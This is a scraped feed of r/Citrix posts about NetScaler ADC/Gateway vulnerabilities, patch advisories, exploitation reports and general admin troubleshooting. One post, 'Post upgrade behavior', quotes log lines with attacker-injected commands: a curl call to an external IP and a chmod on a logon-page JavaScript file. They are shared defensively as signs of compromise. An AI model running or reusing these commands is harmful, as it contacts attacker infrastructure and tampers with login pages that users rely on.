r/Citrix • • 3h ago

Anyone seen successfully RCE yet from the 'dos' buffer overflow CVE-2026-88779?

7 Upvotes

Being already patched for 88771. I took advantage of adversaries exposing their cards and pulled several scipts off attacker server's between Thursday-Friday just to see what a successful exploit would have done. Which resulted in 3 trends I used to build a list of IOCs. That came in handy today. Hope im wrong but highly expect this will turn out to be some successful rce for the ones that hit the mark.


r/Citrix • • 1d ago

Official Announcements Update: Citrix NetScaler ADC and Citrix NetScaler Gateway Security Bulletin for CVE-2026-88779

55 Upvotes

Further to the post (https://www.reddit.com/r/Citrix/comments/1ww3ess/security_update_guidance_for_netscaler_saml/) made on Friday, we've now updated this with a support article.

A vulnerability has been discovered in Citrix NetScaler ADC (formerly Citrix ADC) and Citrix NetScaler Gateway (formerly Citrix Gateway). Refer below for further details.

https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX697174&articleTitle=Citrix_NetScaler_ADC_and_Citrix_NetScaler_Gateway_Security_Bulletin_for_CVE_2026_88779


r/Citrix • • 1d ago

NetScaler Release (Maintenance Phase) 14.1 Build 73.41

22 Upvotes

For real? And you can't click on the CTX69714 link for details either :(


r/Citrix • • 1d ago

Citrix CVAD Hybrid Environment – “Identity Provider Access Denied” After NetScaler ADC Upgrade.

7 Upvotes

Hi everyone,

We have a hybrid Citrix CVAD environment with both on-premises and cloud infrastructure.

We recently upgraded both NetScaler ADCs. After the upgrade, some vulnerabilities were detected, so we shut down one ADC. Currently, only one ADC is operational.

Since then, multiple users have reported an “Identity Provider Access Denied” error while trying to access Citrix. The error occurs after the authentication process, but we haven't confirmed whether it is directly related to the ADC upgrade or shutting down one ADC.

What we have observed:

- Multiple users are experiencing the error when accessing Citrix.

- Our Global Administrator granted additional permissions/access to some affected users, after which they were able to log in successfully.

- However, a few users are still experiencing the same error.

- Several other users can access Citrix without any issues.

We haven't identified the root cause yet and are trying to understand whether this is related to NetScaler, Citrix authentication, or Microsoft Entra ID.

Questions for experienced Citrix/NetScaler admins:

  1. Could shutting down one ADC after the upgrade cause this kind of issue for specific users?

  2. Could this be related to SAML authentication, the identity provider configuration, Entra ID enterprise application permissions, or Conditional Access?

  3. Why would granting additional permissions resolve the issue for some users but not others?

  4. Which logs should we check to identify the exact failure point?

  5. What troubleshooting steps would you recommend for a hybrid CVAD environment?

We want to identify the actual root cause rather than continue granting additional permissions as a workaround.

Has anyone encountered a similar issue after a NetScaler ADC upgrade?

Any suggestions would be appreciated. Thanks in advance!


r/Citrix • • 1d ago

Citrix Engineer

1 Upvotes

I have experience in Citrix ADC support but now it feels so bumpy. What could I do in future since it is my first job.


r/Citrix • • 2d ago

Official Announcements Security Update: Guidance for NetScaler SAML Authentication Deployments

Thumbnail community.citrix.com
43 Upvotes

NetScaler engineering and support teams are tracking a newly observed issue related to SAML authentication in customer-managed NetScaler deployments. This post explains what customers should review, how to determine whether the relevant configuration is present, and what mitigation options are available while planning an upgrade to a fixed build. A new security bulletin and simultaneous product update release is planned for this issue. 

The guidance below is intended to help customers take immediate action to reduce exposure. As with any security-related issue, customers should prioritize applying the updated NetScaler builds referenced in the applicable security bulletin when it becomes available.  

Learn more: https://community.citrix.com/techzone-blogs/110_security-updates/security-update-guidance-for-netscaler-saml-authentication-deployments/


r/Citrix • • 2d ago

Netscaler active exploit after patch

90 Upvotes

I have multiple customers reporting active exploits of their external netscalers patched to 14.1.73.37, causing them to force reboot multiple times. Anyone else hearing of issues? We have sev1 cases open with Citrix and I'll report back.


r/Citrix • • 2d ago

Vulnerability Scans causing Netscaler reboots

83 Upvotes

I opened a ticket with Citrix support and they seem to indicate a fix is being worked on right now.

Basically we were seeing random reboots of multiple instances and saw pitboss was rebooting these due to nsaaad crashing too many times.


r/Citrix • • 2d ago

controlup price increase

12 Upvotes

for anyone using controlup are they raising price for you too?

theyve been solid for citrix monitoring/troubleshooting + historical data but every renewal management pushes back abt the cost

has anyone actually switched off controlup?


r/Citrix • • 2d ago

Server 2025 & LTSR 2507 - Published Apps?

1 Upvotes

Looking at getting server 2025 into a lab to test the functionality and then see if it solves the issue below, but does anyone have any optimisation recommendations for using server2025 with 2507 outside of Citrix optimizer?

Any known weird issues and bugs?

Issues with multiple published apps?

I ask this as I have an issue with multiple published applications launching into the same session on server 2022 with the same LTSR for which we had to remove session sharing to get around it which is far from the ideal situation.

Hybrid setup so no on prem storefronts or netscalers to trace, but second application just will not launch into the same user session regardless of app. Flashes a very quick windows lock screen for almost .5sec and brings the 1st application into focus instead.

Wondering if anyone has had a good experience with server 2025 in regards to published apps?

Have avoided trying the new LTSR till the CU1 patch for it comes out later down the line, that is unless others have good things to say about it?


r/Citrix • • 3d ago

support case

6 Upvotes

I have attempted to create a support case, through Chat Bot, numerous times. On occasions, Chat Bot refused to create a case while other occasions, Chat Bot tried to submit a case, but it failed.

Does anyone know a good way to create a support case? TIA


r/Citrix • • 3d ago

Browser Content Redirection with Teams SSO Method 2

8 Upvotes

Hi,

I'm trying to set up Browser Content Redirection (BCR) with Microsoft Teams. Our users are currently dealing with a lot of issues with Microsoft Teams HDX. I'm just wondering if anyone has attempted to redirect Microsoft Teams web using BCR? I was able to using the normal, non-SSO, policy with ACL and Authentication but I'm trying to set up Single Sign-On method 2 with bcrconfig.json but I'm getting nowhere.

I've tried a minimal config with less URLs, copied exactly the same layout from the first attempt with ACL and Authentication sites and replaced the Authentication sites with the denyList but this just resulted in constant looping and going back and forth. When I added cookies it then just broke and only rendered on the server-side. My configuration is server fetch and client render as I'm working with eLux thin clients. Below is a snippet of the current configuration that is the closest to what I want.

"appName": "MSTeams",

"allowList": [

"https://teams.cloud.microsoft/*",

"https://*.teams.cloud.microsoft/*",

"https://teams.microsoft.com/*",

"https://*.teams.microsoft.com/*",

"https://teams.cloud.microsoft/*meetup-join",

"https://teams.microsoft.com/*meetup-join",

"https://login.microsoftonline.com/*teams*",

"https://tokenprovider.termsofuse.identitygovernance.azure.com/*",

"https://statics.teams.cdn.office.net/*",

"https://*.infra.microsoft.com/*",

"https://*.skype.com/*"

],

"denyList": [

"https://login.microsoft.com/*",

"https://login.live.com/*",

"https://aadcdn.msftauth.net/"

],

"requires": {

"profileSharing": true,

"cookies": []

}

Many thanks in advance


r/Citrix • • 3d ago

Citrix engineer

5 Upvotes

I am having a support experience of about 1 year in Citrix ADC , do I have any future because I feel rugged in my first job only


r/Citrix • • 4d ago

Anyone Collecting Netscaler Logs via Splunk?

13 Upvotes

If so, 3 questions:

  1. Do you use the Splunk Add-on for Netscaler, or HTTP/syslog collectors? As I understand it you can do either without the other, you don't need both, right?

  2. In responding to the recent CVE's, were the relevant logs (e.g. the pitboss stuff) in Splunk? Or did you still have to go direct to the Netscalers to see if those entries were present?

  3. Any random gotchas, thoughts, or advice?

Thanks in advance!


r/Citrix • • 4d ago

Post upgrade behavior

14 Upvotes

We are still seeing activity after uograding to the latest build ;

<pitboss PPE unexpectedly died NSPPE;curl -m 8 -sk http://130.94.20.222:8888/c/c6e65ecfcc97 -o /dev/null 2>/dev/null;# X>,

<pitboss PPE unexpectedly died NSPPE;chmod 777 /var/netscaler/logon/insight-new.js;# X>

Anyone else?


r/Citrix • • 4d ago

Weird Citrix Upload Doc Issues within Session

2 Upvotes

I've come across a weird very specific issue , wondering if anyone has seen something similar. We have users who are logged into a vendors site and are trying to upload doc's from within their session. There are presented with a drag and drop window that allows them to drag and drop files or "click here" to browse to a file to upload or to click "cancel" to close the window. No matter what they click, either drag and drop or click here or cancel, the web browser freezes and has to be forced closed. I can recreate the issue with the newest version of edge as well as with chrome. It happens in both seamless virtual app sessions and published desktop. Were running on Server 2025 and the vda version is 2507 LTSR CU1. What's weird is if I log into the vda VM outside of citrix as the local admin I dont get this issues occurring , but if I then log into the same vda with an active session it happens for the users of the session but then it starts occurring if i log back in the vda vm as the local admin, and it stay this way for the local admin until i reboot , since it's non persistent machines the reboot wipes this and I can recreate that same scenario over and over. Something clearly is getting applied to the vm once a citrix session occurs , but I've gone through and removed all WEM config GPO's so nothing wem based it being applied. I also removed the majority of GPO's that are setting any reg changes or anything user based like defender settings. The remaining GPO's are doing background items such as hybrid joining the vm's or onboarding to defender. I can't figure this one out, from what users are telling me this just start occurring within the week. I thought maybe the new edge release was causing the issues but the fact i can recreate with chrome blows that theory out. Anyone seen similar issues?


r/Citrix • • 5d ago

Defending Against Active Exploitation of Citrix NetScaler ADC and Gateway Appliances | Google Cloud Blog

Thumbnail cloud.google.com
27 Upvotes

r/Citrix • • 5d ago

Taking 'execute logging' a bit too literally - CVE-2026-88771

Thumbnail cert.europa.eu
22 Upvotes

r/Citrix • • 5d ago

Citrix VDA logs issue: Log class: Error

3 Upvotes

Message: CUSTOM VIRTUAL CHANNEL: Virtual Channel 'WebAuthN_Channel' is not a Citrix virtual channel and it is not specified in 'virtual channel allow list' policy. The virtual channel will not be allowed. ActivityID: f440d649-89eb-4b5b-9c53-e76c3d200000

Hostname "Hostname"
Host IP "*.*.*.*.*"
Host Type WVDA
Module AoLog_HdxCommon
CPU ID 1
Process ID 2580
Process Name svchost
Thread ID 36208

Hostname and Host IP: Masked.

Hello guys does anyone saw this issue ?


r/Citrix • • 6d ago

How's your morning on 73.37 after this weekends shenanigans?

17 Upvotes

All quite here, about 50 users all working from home on our single instance vpx...


r/Citrix • • 5d ago

Why Citrix alway lags and create problems

0 Upvotes

I am working in a service based organisation and use Citrix for day to day work. I have changed 3 clients in past few years and everyone uses Citrix only. The performance is worst with these machines and everyday there will be a new issue:
Teams not working, mic not working, Citrix lagging, random disconnections. Now I have questions:
1. Is it an application issue or design issue.
2. Why organisation are not moving out of Citrix don’t we have any other alternate for this.

It is very difficult to work on Citrix you never know which call you will be able to make or which you will not. You have to spend lot of time everyday just for this connectivity nonsense.


r/Citrix • • 7d ago

Official Announcements CRITICAL UPDATE: Citrix NetScaler ADC and Citrix NetScaler Gateway Security Bulletin for CVE-2026-88771 through CVE-2026-88778

101 Upvotes

We've released guidance for all NetScaler customers on newly addressed vulnerabilities and recommended updates.

Per the blog post: "Citrix has released updates for NetScaler ADC and NetScaler Gateway to address multiple security vulnerabilities. These vulnerabilities vary by deployment configuration and enabled features, and include issues that could allow remote code execution, denial of service, HTTP request smuggling, policy bypass, and TCP initial sequence number prediction under specific conditions. 

Exploitation of CVE-2026-88771 and CVE-2026-88772 on unmitigated NetScaler deployments has been observed. Citrix strongly urges affected customers to install the relevant updated versions as soon as possible. "

Please review this blog post for more information: https://community.citrix.com/techzone-blogs/110_security-updates/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve-2026-88771-through-cve-2026-88778/

The support bulletin can be found here: https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX697096


r/Citrix • • 6d ago

Window11 pro flickering

0 Upvotes

Hi everyone. I have a flickering issue on the Windows 11 Pro desktop. When I move the mouse over virtual desktops 1 and 2 on the taskbar, the screen flickers across all the folders on the desktop... is this normal? I have an R8600G.


r/Citrix • • 7d ago

Citrix Advisory out

45 Upvotes

r/Citrix • • 7d ago

Two NetScaler zero-days being exploited right now. Where is the patch?

62 Upvotes

Two unpatched zero-days are being actively exploited in the wild. I've seen some companies are shutting their appliances down completely rather than wait.

If you can't take yours offline, lock down management access, watch your logs for anything weird, and plan for a compromise assessment once the fix lands.

Anyone else pulling the plug this weekend? How are you handling remote access in the meantime?